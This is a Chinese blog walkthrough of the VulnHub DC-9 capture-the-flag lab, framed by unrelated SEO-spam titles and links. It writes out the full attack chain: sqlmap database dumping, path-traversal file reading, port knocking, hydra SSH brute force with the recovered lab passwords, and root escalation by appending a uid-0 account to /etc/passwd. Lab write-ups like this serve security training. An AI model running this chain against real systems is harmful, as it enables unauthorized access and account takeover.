当前位置: 首页 > news >正文

为什么要建设营销型网站seo网络培训

为什么要建设营销型网站,seo网络培训,做网站的励志故事,logo设计免费平台文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-9下载地址:https://download.vulnhub.com/dc/DC-9.zip kali:192.168.144.148 DC-9:192.168.144.158 二、渗透流程 1、信息收集nmap -T5 -A -p- -sV -sT 192.168.144.158思路&am…

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

DC-9下载地址:https://download.vulnhub.com/dc/DC-9.zip
kali:192.168.144.148
DC-9:192.168.144.158


二、渗透流程

1、信息收集

nmap -T5 -A -p- -sV -sT 192.168.144.158

思路:

1、80端口

目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……

3、目录扫描、指纹识别

结果暂无有用信息,对页面功能点进行检查
目录扫描:dirsearch -u http://192.168.144.158
指纹识别:whatweb http://102.168.144.158


2、漏洞探测

2.1、SQL注入

1.爆数据库

方法1:sqlmap -r 1.txt --dbs  #抓包POST注入
方法2:sqlmap -u "http://192.168.144.158/results.php" --data "search=1" --dbs

2.爆Staff数据库的表

方法1:sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D Staff --tables
方法2:sqlmap -r 1.txt -D Staff --tables

3.爆Users表的字段

方法1:sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D Staff -T Users --dump
方法2:sqlmap -r 1.txt -D Staff -T Users --dump 

4.解密password

md5解密地址:https://www.somd5.com/
账号 密码:admin transorbital1

5.爆数据库users的表

sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D users --tables
sqlmap -r 1.txt -D users --tables 

6.爆UserDetails表的字段

sqlmap -u "http://192.168.144.158/results.php" --data "search=1" -D users -T  UserDetails --dump
sqlmap -r 1.txt -D users -T UserDetails --dump

思路:
1、获取到admin账号和密码,登录后台;
2、users数据库爆破出的账号密码暂时无用。


2.2、文件包含

1.登录后台

文件包含线索:1.页面显示File does not exist;2.目录爆破的时候发现include目录。

2./etc/password

wfuzz -b 'PHPSESSID=jto9ulf88r04ds3570qb4sfl4b' --hw 100  -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.144.158/manage.php?FUZZ=../../../../../../../../../etc/passwd

访问:http://192.168.144.158/manage.php?file=../../../../../../../../../etc/passwd


2.3、连接SSH

1.利用UserDetails表的字段,爆破ssh账号密码

 hydra -L user-dict -P pass-dict 192.168.144.158 ssh

思路:
1、用户被限制登录
2、运行了knockd服务
3、端口被限制(防火墙)

2.访问敲门服务配置文件knockd.conf
http://192.168.144.158/manage.php?file=…/…/…/…/…/…/…/…/…/…/etc/knockd.conf


3.利用nmap进行敲门

4.22端口开启

5.再次爆破ssh账密

 hydra -L user-dict -P pass-dict 192.168.144.158 ssh

爆破出有3个用户,chandlerb UrAG0D!joeyt Passw0rdjanitor Ilovepeepee

6.ssh连接
ssh chandlerb@192.168.144.158

ssh joeyt@192.168.144.158

ssh janitor@192.168.144.158

发现新的密码文件

结合之前获取到的账号,再次进行爆破

得到用户:fredf B4-Tru3-001
使用账密登录ssh:ssh fredf@192.168.144.158


3、权限

发现无需密码,就可以以root权限执行的文件

sudo -l

查看test文件,发现其为乱码

./test查看文件用法

usage:test.py文件的读和追加。

查找test.py文件

find / -name "test.py" 2>/dev/null
cat /opt/devstuff/test.py


md5加盐加密

 openssl passwd -1 -salt testDC9 123456

-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密

写入/tmp临时目录下

echo 'testDC9:$1$testDC9$7DqifpbKzKYKpgnH4SUlz.:0:0::/root:/bin/bash' >> /tmp/passwd


在root权限的目录下运行test程序

 cd /opt/devstuff/dist/test/sudo ./test /tmp/passwd /etc/passwdsu testDC9


查看flag


三、思路总结

1、信息收集2280端口;
2、web站点,发现sql注入和文件包含;
3、利用sql注入获取到账号密码登录后台;
4、利用文件包含查看敲门服务配置文件knockd.conf;
5、ssh连接,查看文件;
6、寻找可以root权限执行的文件;
7、写入用户,以root身份运行。

http://www.hrbkazy.com/news/6429.html

相关文章:

  • 深圳网站外包公司如何设计推广方案
  • 搜索引擎优化至少包括哪几步保定seo推广外包
  • 如何 做网站线上推广方案怎么写
  • 苏州网站制作网站建设软件制作
  • 做熊猫tv网站的目的专业的制作网站开发公司
  • wordpress授权代码seo怎么做教程
  • 微信微网站建设平台网页设计代码
  • 做网站用Linux还是win嘉兴网站建设方案优化
  • 把nas做网站操作流程怎么做网络推广优化
  • 深圳罗湖网站设计公司价格网店推广常用的方法
  • 商务网站建设中的必备功能网络推广方法有哪些
  • 国外网站做任务赚钱的深圳百度推广开户
  • 大型外贸商城网站建设抖音十大搜索关键词
  • 政府门户网站建设意义链接交换平台
  • 国内建站源码石家庄百度seo
  • 南宁微网站制作企业网站优化服务
  • 郑州网站建设行情苏州seo关键词优化排名
  • 简单的企业小网站网址大全
  • 网站建设推广找stso88效果好流程优化的七个步骤
  • web网站开发的参考文献企业官网搭建
  • 网站建设制作细节广州seo推广培训
  • 襄阳市做网站 优帮云阿里大数据平台
  • 网站有了域名然后怎么做今日的最新新闻
  • 怎么用织梦模板做网站一键制作单页网站
  • 网站建设维保合同范本百度seo排名曝光行者seo
  • 做网站小程序类似58的推广平台有哪些平台
  • 选择邯郸网站制作app推广接单平台有哪些
  • wordpress:代码网站排名优化公司哪家好
  • 旧电脑怎么做网站济南seo排名优化推广
  • 怎么样推广网站seo优化推广多少钱